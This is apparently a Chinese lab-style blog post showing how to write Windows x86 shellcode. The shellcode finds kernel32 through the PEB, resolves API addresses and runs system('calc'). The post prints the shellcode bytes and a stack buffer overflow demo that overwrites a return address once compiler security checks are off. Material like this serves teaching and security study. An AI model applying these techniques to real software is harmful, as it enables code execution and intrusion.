shellcode攻擊

首先編寫shellcode代碼

#include "windows.h"  
#include <stdio.h>  
#pragma comment(linker,"/SECTION:.data,RWE")   
  
void test()  
{  
  
    char buf[8];  
    strcpy_s(buf, sizeof(shellcode), shellcode);  
}  
  
void test_shellcode()  
{  
    ((void(*)())&shellcode)();  
    /*__asm  
    {  
        lea eax, shellcode;  
        jmp eax;  
    }*/  
}  
  
unsigned char *asm_code()  
{  
    __asm  
    {  
        lea eax, __code  
            jmp __ret  
    }  
    //這里放shellcode的匯編代碼  
    __asm  
    {  
    __code:  
        push ebp;  
        mov esi, fs:0x30;            //PEB    
        mov esi, [esi + 0x0C];   //+0x00c Ldr              : Ptr32 _PEB_LDR_DATA    
        mov esi, [esi + 0x1C];  //+0x01c InInitializationOrderModuleList : _LIST_ENTRY    
    next_module:  
        mov ebp, [esi + 0x08];  
        mov edi, [esi + 0x20];  
        mov esi, [esi];  
        cmp[edi + 12 * 2], 0x00;  
        jne next_module;  
        mov edi, ebp; //BaseAddr of Kernel32.dll  
  
        //尋找GetProcAddress地址    
        sub esp, 100;  
        mov ebp, esp;  
        mov eax, [edi + 3ch];//PE頭    
        mov edx, [edi + eax + 78h]  
            add edx, edi;  
        mov ecx, [edx + 18h];//函數(shù)數(shù)量    
        mov ebx, [edx + 20h];  
        add ebx, edi;  
    search:  
        dec ecx;  
        mov esi, [ebx + ecx * 4];  
        add esi, edi;  
        mov eax, 0x50746547;  
        cmp[esi], eax;  
        jne search;  
        mov eax, 0x41636f72;  
        cmp[esi + 4], eax;  
        jne search;  
        mov ebx, [edx + 24h];  
        add ebx, edi;  
        mov cx, [ebx + ecx * 2];  
        mov ebx, [edx + 1ch];  
        add ebx, edi;  
        mov eax, [ebx + ecx * 4];  
        add eax, edi;  
        mov[ebp + 76], eax;//eax為GetProcAddress地址    
  
        //獲取LoadLibrary地址    
        push 0;  
        push 0x41797261;  
        push 0x7262694c;  
        push 0x64616f4c;  
        push esp  
            push edi  
            call[ebp + 76]  
            mov[ebp + 80], eax;  
  
        //獲取ExitProcess地址    
        push 0;  
        push 0x737365;  
        push 0x636f7250;  
        push 0x74697845;  
        push esp;  
        push edi;  
        call[ebp + 76];  
        mov[ebp + 84], eax;  
  
        ////////////////////////////////////////////我的代碼開始    
  
        //獲取Sleep地址    
        push 0x70;  
        push 0x65656C53;  
        push esp;  
        push edi;  
        call[ebp + 76];  
        mov[ebp + 88], eax;  
  
        //Sleep(10000)    
        //push 0xFFFFFFFF;  
        //call[ebp + 88];  
  
  
        ///////////////////////////////////////////我的代碼結(jié)束    
  
        //加載msvcrt.dll   LoadLibrary("msvcrt")    
        push 0;  
        push 0x7472;  
        push 0x6376736d;  
        push esp;  
        call[ebp + 80];  
        mov edi, eax;  
  
        //獲取system地址    
        push 0;  
        push 0x6d65;  
        push 0x74737973;  
        push esp;  
        push edi;  
        call[ebp + 76];  
        mov[ebp + 92], eax;  
  
        //system("calc")    
        push 0;  
        push 0x636c6163;  
        push esp;  
        call[ebp + 92];  
  
        //ExitProcess    
        call[ebp + 84];  
    }  
  
    //函數(shù)結(jié)語  
    __asm int 3  
    __asm { __ret: }  
}  
  
  
int main()  
{  
    unsigned char temp;  
    int i = 1;  
    unsigned char *asm_p = asm_code();  
    FILE *fd = fopen("code.txt", "w");  
    fprintf(fd, "unsigned char shellcode[] = \"");  
    while ((temp = *asm_p) != 0xcc)  
    {  
        fprintf(fd, "\\x%.2x", temp);  
        asm_p++;  
        if (i % 8 == 0) fprintf(fd, "\"\n\"");  
        i++;  
    }  
    fprintf(fd, "\";");  
    fclose(fd);  
    /*__asm  
    {  
        lea eax, shellcode;  
        jmp eax;  
    }*/  
    //((void(*)())&shellcode)();  
    return 0;  
}

直接運行,之后打開項目所在文件夾,會發(fā)現(xiàn)一個code.text文件,打開里面會有已經(jīng)準備好的unsigned char shellcode[]的初始化。把它放到全局變量里,之后修改main函數(shù)代碼為

unsigned char shellcode[] = "\x55\x64\x8b\x35\x30\x00\x00\x00"
"\x8b\x76\x0c\x8b\x76\x1c\x8b\x6e"
"\x08\x8b\x7e\x20\x8b\x36\x80\x7f"
"\x18\x00\x75\xf2\x8b\xfd\x83\xec"
"\x64\x8b\xec\x8b\x47\x3c\x8b\x54"
"\x07\x78\x03\xd7\x8b\x4a\x18\x8b"
"\x5a\x20\x03\xdf\x49\x8b\x34\x8b"
"\x03\xf7\xb8\x47\x65\x74\x50\x39"
"\x06\x75\xf1\xb8\x72\x6f\x63\x41"
"\x39\x46\x04\x75\xe7\x8b\x5a\x24"
"\x03\xdf\x66\x8b\x0c\x4b\x8b\x5a"
"\x1c\x03\xdf\x8b\x04\x8b\x03\xc7"
"\x89\x45\x4c\x6a\x00\x68\x61\x72"
"\x79\x41\x68\x4c\x69\x62\x72\x68"
"\x4c\x6f\x61\x64\x54\x57\xff\x55"
"\x4c\x89\x45\x50\x6a\x00\x68\x65"
"\x73\x73\x00\x68\x50\x72\x6f\x63"
"\x68\x45\x78\x69\x74\x54\x57\xff"
"\x55\x4c\x89\x45\x54\x6a\x70\x68"
"\x53\x6c\x65\x65\x54\x57\xff\x55"
"\x4c\x89\x45\x58\x6a\x00\x68\x72"
"\x74\x00\x00\x68\x6d\x73\x76\x63"
"\x54\xff\x55\x50\x8b\xf8\x6a\x00"
"\x68\x65\x6d\x00\x00\x68\x73\x79"
"\x73\x74\x54\x57\xff\x55\x4c\x89"
"\x45\x5c\x6a\x00\x68\x63\x61\x6c"
"\x63\x54\xff\x55\x5c\xff\x55\x54"
"";
void hacker()
{
    printf("%i", 1);//當該函數(shù)被調(diào)用時,說明溢出攻擊成功了  
    exit(5);
}

void fun(char *str)
{
    char buffer[4];
    memcpy(buffer, str, 16);
}

int main()
{ 
    char badStr[] = "000011112222333344445555";//創(chuàng)建了一個24個字節(jié)的字符數(shù)組  
    DWORD *pEIP = (DWORD*)&badStr[8];//獲取該數(shù)組的第八個元素的地址(從第零個開始)  
                                     //*pEIP = (DWORD)&shellcode[0];//獲取shellcode數(shù)據(jù)片開頭地址  
    *pEIP = (DWORD)hacker;//獲取hacker函數(shù)地址(三十二位二進制數(shù)),同時賦給pEIP(即修改了badStr的2222變?yōu)閔acker函數(shù)地址)  
    fun(badStr);//開始攻擊  
    return 0;
}

修改基本運行時檢查為默認值,修改緩沖區(qū)安全檢查為否。
運行程序,發(fā)現(xiàn)log窗口中出現(xiàn) ”程序“[0x202C] console1.exe: 本機”已退出,返回值為 5 (0x5)。
說明執(zhí)行了exit(5)代碼,攻擊成功。


實驗截圖
最后編輯于
?著作權(quán)歸作者所有,轉(zhuǎn)載或內(nèi)容合作請聯(lián)系作者
【社區(qū)內(nèi)容提示】社區(qū)部分內(nèi)容疑似由AI輔助生成,瀏覽時請結(jié)合常識與多方信息審慎甄別。
平臺聲明:文章內(nèi)容(如有圖片或視頻亦包括在內(nèi))由作者上傳并發(fā)布,文章內(nèi)容僅代表作者本人觀點,簡書系信息發(fā)布平臺,僅提供信息存儲服務(wù)。

相關(guān)閱讀更多精彩內(nèi)容

友情鏈接更多精彩內(nèi)容